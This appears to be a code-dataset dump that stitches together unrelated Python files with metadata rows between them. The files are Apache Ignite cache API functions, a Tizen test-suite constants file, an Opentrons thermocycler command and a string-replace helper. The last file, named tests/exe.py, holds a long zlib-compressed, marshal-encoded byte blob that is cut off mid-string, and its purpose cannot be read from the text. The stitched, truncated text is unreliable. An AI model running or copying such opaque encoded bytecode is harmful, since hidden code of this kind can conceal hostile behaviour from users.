:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None if a value is written, non-zero status and an error description
in case of error.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, returning previous value
for that key, if and only if there is a value currently mapped
for that key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REPLACE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_remove(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Removes the cache entry with specified key, returning the value.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REMOVE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key
does not already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_get_and_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key does not
already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_replace_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample, value,
key_hint=None, sample_hint=None, value_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exists
and value equals provided sample.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param value: new value for the given key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param sample_hint: (optional) Ignite data type, for whic
the given sample should be converted
:param value_hint: (optional) Ignite data type, for which the given value
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_clear(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Clears the cache without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_clear_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
)
def cache_clear_keys(
connection: 'Connection', cache: Union[str, int], keys: list,
binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache keys without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample,
key_hint=None, sample_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes an entry with a given key if provided value is equal to
actual value, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param sample_hint: (optional) Ignite data type, for whic
the given sample should be converted
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes entries with given keys, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_all(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Removes all entries from cache, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_ALL,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_get_size(
connection: 'Connection', cache: Union[str, int], peek_modes=0,
binary=False, query_id=None,
) -> 'APIResult':
"""
Gets the number of entries in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param peek_modes: (optional) limit count to near cache partition
(PeekModes.NEAR), primary cache (PeekModes.PRIMARY), or backup cache
(PeekModes.BACKUP). Defaults to all cache partitions (PeekModes.ALL),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a number of
cache entries on success, non-zero status and an error description
otherwise.
"""
if not isinstance(peek_modes, (list, tuple)):
if peek_modes == 0:
peek_modes = []
else:
peek_modes = [peek_modes]
query_struct = Query(
OP_CACHE_GET_SIZE,
[
('hash_code', Int),
('flag', Byte),
('peek_modes', PeekModes),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'peek_modes': peek_modes,
},
response_config=[
('count', Long),
],
)
if result.status == 0:
result.value = result.value['count']
return result
| 33.561698 | 100 | 0.62789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 20,317 | 0.597383 |
6a0e57de9c3d93fdc79f1a9d3f94690a6652bf6e | 989 | py | Python | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys, os
import itertools, shutil
path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print path
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result= path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive =path_allpairs + "/positivee"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
| 31.903226 | 59 | 0.743175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 318 | 0.321537 |
6a0e7a4577ac3f9f8b9fd994210704a26f91ee39 | 2,606 | py | Python | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | """Command models to open a Thermocycler's lid."""
from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from typing_extensions import Literal, Type
from pydantic import BaseModel, Field
from ..command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
from opentrons.protocol_engine.types import MotorAxis
if TYPE_CHECKING:
from opentrons.protocol_engine.state import StateView
from opentrons.protocol_engine.execution import EquipmentHandler, MovementHandler
OpenLidCommandType = Literal["thermocycler/openLid"]
class OpenLidParams(BaseModel):
"""Input parameters to open a Thermocycler's lid."""
moduleId: str = Field(..., description="Unique ID of the Thermocycler.")
class OpenLidResult(BaseModel):
"""Result data from opening a Thermocycler's lid."""
class OpenLidImpl(AbstractCommandImpl[OpenLidParams, OpenLidResult]):
"""Execution implementation of a Thermocycler's open lid command."""
def __init__(
self,
state_view: StateView,
equipment: EquipmentHandler,
movement: MovementHandler,
**unused_dependencies: object,
) -> None:
self._state_view = state_view
self._equipment = equipment
self._movement = movement
async def execute(self, params: OpenLidParams) -> OpenLidResult:
"""Open a Thermocycler's lid."""
thermocycler_state = self._state_view.modules.get_thermocycler_module_substate(
params.moduleId
)
thermocycler_hardware = self._equipment.get_module_hardware_api(
thermocycler_state.module_id
)
# move the pipettes and gantry over the trash
# do not home plunger axes because pipettes may be holding liquid
await self._movement.home(
[
MotorAxis.X,
MotorAxis.Y,
MotorAxis.RIGHT_Z,
MotorAxis.LEFT_Z,
]
)
if thermocycler_hardware is not None:
await thermocycler_hardware.open()
return OpenLidResult()
class OpenLid(BaseCommand[OpenLidParams, OpenLidResult]):
"""A command to open a Thermocycler's lid."""
commandType: OpenLidCommandType = "thermocycler/openLid"
params: OpenLidParams
result: Optional[OpenLidResult]
_ImplementationCls: Type[OpenLidImpl] = OpenLidImpl
class OpenLidCreate(BaseCommandCreate[OpenLidParams]):
"""A request to open a Thermocycler's lid."""
commandType: OpenLidCommandType = "thermocycler/openLid"
params: OpenLidParams
_CommandCls: Type[OpenLid] = OpenLid
| 30.302326 | 87 | 0.699156 | 2,032 | 0.779739 | 0 | 0 | 0 | 0 | 810 | 0.310821 | 552 | 0.211819 |
6a0eabac2607fdcd5104aaa4361b75c94d229375 | 373 | py | Python | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 36 | 2021-11-10T05:17:18.000Z | 2022-03-27T18:25:10.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 1 | 2021-12-03T07:07:18.000Z | 2022-03-08T09:29:03.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 4 | 2021-11-28T07:39:57.000Z | 2022-03-30T05:46:10.000Z | def multiple_replace(text: str, chars_to_mapping: dict):
"""
This function is used to replace a dictionary of characters inside a text string
:param text:
:param chars_to_mapping:
:return:
"""
import re
pattern = "|".join(map(re.escape, chars_to_mapping.keys()))
return re.sub(pattern, lambda m: chars_to_mapping[m.group()], str(text))
| 31.083333 | 84 | 0.678284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.423592 |
6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b | 14,182 | py | Python | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
] | 4 | 2021-02-11T13:43:55.000Z | 2021-11-14T20:16:34.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
] | 3 | 2021-10-04T12:16:00.000Z | 2021-12-10T06:02:41.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
] | null | null | null | import marshal as ms
import zlib
import base64 as bs
data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 \x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\x